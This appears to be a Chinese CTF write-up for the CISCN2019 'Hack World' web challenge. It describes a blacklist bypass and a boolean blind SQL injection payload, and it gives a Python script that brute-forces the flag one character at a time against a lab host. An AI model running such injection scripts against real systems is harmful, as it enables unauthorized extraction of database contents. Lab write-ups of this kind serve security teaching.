[CISCN2019 华北赛区 Day2 Web1]Hack World

1,测试

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述思路:大概率得盲注了。
2,burp测试黑名单关键字
select、from、if、异或^可用。

盲注构造语句:

id=(select(ascii(mid(flag,1,1))=102)from(flag))

3、使用脚本

# -*- coding = utf-8 -*-

import requests
import string

def blind_sql(url):
    flag=''                     #接收结果
    for num in range(1,60):     #flag一般不超过50个字符
        for i in string.printable:  #string.printable将给出所有的标点符号,数字,ascii_letters和空格
            payload='(select(ascii(mid(flag,{0},1))={1})from(flag))'.format(num,ord(i)) #ord函数用来获取单个字符的ascii码
            post = {"id":payload}
            result = requests.post(url=url,data=post)   #提交post请求
            if 'Hello' in result.text:
                flag += i   #用flag接收盲注得到的结果
                print(flag) #打印结果
            else:
                continue
    print(flag)

if __name__ == '__main__':
    url='http://73f759e5-bcca-4b8d-94e6-4b160c714d14.node4.buuoj.cn:81/index.php'
    blind_sql(url)

思考:这里如果对访问次数加以限制就很难爆破盲注突破了。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值